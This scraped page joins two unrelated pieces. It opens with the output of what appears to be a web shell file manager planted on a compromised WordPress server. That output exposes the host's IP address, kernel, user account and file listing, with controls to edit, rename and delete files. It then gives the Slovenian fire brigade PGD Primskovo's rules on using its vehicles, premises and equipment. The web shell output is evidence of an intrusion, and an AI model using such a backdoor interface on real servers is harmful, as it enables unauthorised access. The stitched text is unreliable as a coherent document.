postpass VERSION - 【2021-11-29 07:54:42 星期1】
185.53.12.10 - Linux s5.dnserv.com 3.10.0-714.10.2.lve1.5.17.el7.x86_64 #1 SMP Mon Apr 30 13:06:32 EDT 2018 x86_64 - whoami(bregarsi) - 【uid(1266) gid(1269)】 - 【 - PostgreSql】
VERSION

路径

上传重命名为
上级目录操作属性创建时间修改时间下载
.quarantine删除 改名07552021-03-17 13:39:012021-02-05 00:07:41-
.tmb删除 改名07552021-03-17 13:39:012021-02-05 00:07:41-
.well-known删除 改名07552021-03-17 13:39:012019-12-16 23:22:41-
arhiv删除 改名07552021-03-17 13:39:012021-02-13 16:15:33-
files删除 改名07552021-03-17 13:39:012021-02-13 16:15:48-
film删除 改名07552021-03-17 13:39:012021-02-13 16:15:50-
wp-admin删除 改名07552021-08-09 20:19:482021-08-09 20:19:48-
wp-content删除 改名07552021-11-28 13:12:452021-11-28 13:12:45-
wp-includes删除 改名07552021-11-22 19:17:202021-11-22 19:17:20-
.ftpquota编辑 改名06442021-11-22 23:28:032021-11-22 23:28:0315 B
.htaccess编辑 改名06442021-11-24 09:19:332021-11-24 09:19:30199 B
.user.ini编辑 改名06442021-03-17 13:39:012020-01-18 01:11:09120 B
error_log编辑 改名06442021-11-29 07:05:132021-11-29 07:05:1333.65 K
index.php编辑 改名06442021-11-24 09:19:152020-02-06 11:03:1220.53 K
index.txt编辑 改名06442021-06-22 17:14:412021-06-22 17:14:41404 B
lib.core.php编辑 改名06442021-03-17 13:39:012020-11-14 13:10:210 B
license.txt编辑 改名06442021-08-09 20:19:482021-01-01 04:49:0819.45 K
readme.html编辑 改名06442021-11-10 21:57:102021-11-10 21:57:107.17 K
wordfence-waf.php编辑 改名06442021-03-17 13:39:012020-01-18 01:11:09433 B
wp-activate.php编辑 改名06442021-08-09 20:19:482021-01-21 06:07:007.00 K
wp-blog-header.php编辑 改名06442021-08-09 20:19:482020-02-06 11:03:12351 B
wp-blog-post.php编辑 改名06442021-03-17 13:39:012021-02-07 13:40:152.11 K
wp-comments-post.php编辑 改名06442021-08-09 20:19:482021-02-17 17:38:062.27 K
wp-config-sample.php编辑 改名06442021-08-09 20:19:482021-05-21 14:10:562.93 K
wp-config.php编辑 改名06442021-03-17 13:39:012019-12-22 07:02:493.03 K
wp-cron.php编辑 改名06442021-08-09 20:19:492020-07-30 22:44:043.85 K
wp-links-opml.php编辑 改名06442021-08-09 20:19:542020-02-06 11:03:122.44 K
wp-load.php编辑 改名06442021-08-09 20:19:542021-05-15 21:08:063.81 K
wp-login.php编辑 改名06442021-08-09 20:19:542021-04-06 22:09:1044.40 K
wp-mail.php编辑 改名06442021-08-09 20:19:542020-04-14 15:02:068.31 K
wp-settings.php编辑 改名06442021-08-09 20:19:542021-06-02 02:39:5821.77 K
wp-signup.php编辑 改名06442021-08-09 20:19:542021-05-07 23:46:0030.95 K
wp-trackback.php编辑 改名06442021-08-09 20:19:542020-10-09 00:45:144.64 K
xmlrpc.php编辑 改名06442021-08-09 20:19:542020-06-08 23:25:103.16 K
目录[9] - 文件[25] - 属性[0750]
Pravilnik o uporabi vozil, prostorov in opreme PGD Primskovo – Prostovoljno gasilsko društvo Primskovo

I. Splošna določila

1.
Prostori, okolica, gasilska vozila in gasilska oprema v lasti ali uporabi PGD Primskovo se uporablja zgolj namensko in skrbno.

2.
Za prostore in okolico so posebej odgovorni predsednik in člani UO PGD Primskovo ter hišnik, ob uporabi pa vsi člani PGD Primskovo.

Za gasilsko opremo so odgovorni poveljnik, orodjar, strojnik, namestnik poveljnika, glavni vozniki in vsi uporabniki skladno s pravili službe. O uporabi, servisih in vzdrževanju vodijo materialno tehnično evidenco.

3.
Izposoja gasilske opreme je strogo prepovedana brez soglasja poveljnika PGD Primskovo.

4.
Ostala oprema, lastnina in prostori se za negasilske aktivnosti lahko uporabljajo zgolj z dovoljenjem predsednika PGD Primskovo v skladu z odločitvami UO PGD Primskovo.

5.
Vozil se za uporabo ne posoja.

6.
Nepooblaščeno dajanje prostorov, opreme in lastnine je resna kršitev, ki jo obravnava disciplinska komisija PGD Primskovo. Izdajatelj tako oddane opreme krije vse stroške najema skladno s cenikom PGD Primskovo. V primeru poškodb opreme poleg najema krije tudi stroške popravila oziroma nabave nove opreme ali vozila.

II. Posebne ugodnosti za določene vrste članov društva

7.
Če v pravilniku ni opredeljeno drugače, te ugodnosti veljajo zgolj za člane z naslednjimi statusi:

– operativni gasilec.
– rezervni operativni gasilec.

8.
Enkrat letno si z dovoljenjem vodstva lahko izposodijo gasilsko opremo, ki ni nujna za posredovanje. Poškodbe in popravilo opreme krije uporabnik.

9.
Enkrat letno za en dan lahko z dovoljenjem predsednika PGD uporabijo dvorano PGD Primskovo pod pogojem, da jih skrbno uporabljajo in pustijo v boljšem stanju od zatečenega ter upoštevajo hišni red PGD Primskovo. Ostale izposoje se zaračuna skladno s cenikom PGD Primskovo.

Ta člen velja tudi za vse člane PGD Primskovo s plačano članarino.

10.
Enkrat letno imajo pravico do izposoje gasilskih kompletov miz in klopi. Ostale izposoje plačajo po ceniku.

Ta člen velja tudi za vse člane PGD Primskovo s plačano članarino.

III. Posebna navodila za uporabo vozila GVV-1 in GVM-1

11.
Glede na to, da je vozilo GVV-1 pomemben člen v operativni sposobnosti PGD Primskovo, mora biti vsaka uporaba v obsegu, da je operativna sposobnost društva čim manj okrnjena. Vozila GVV-1 se ne posoja, o uporabi odloča poveljnik PGD, vozi pa ga lahko samo voznik, ki je član PGD Primskovo.

Enaka tehnična pravila veljajo tudi za vozilo GVM-1.

Vsaka uporaba oziroma izvoz se javi poveljniku PGD Primskovo prek SMS in na ReCO prek radijske postaje.

IV. Končna določba

12.
S kršitvijo katere koli od točk tega pravilnika oseba trajno izgubi pravico do uporabe, izposoje ali najema opreme in prostorov PGD Primskovo. Kršitev ugotavlja disciplinska komisija PGD Primskovo na predlog vodstva PGD Primskovo.

13.
Podrobnejša pravila se opredeli v hišnem redu PGD Primskovo.

14.
Pravilnik o uporabi vozil, prostorov in opreme PGD Primskovo je sprejel upravni odbor PGD Primskovo na 3. redni seji, dne 15.09.2018.

Damjan Smrekar, l.r.
predsednik PGD Primskovo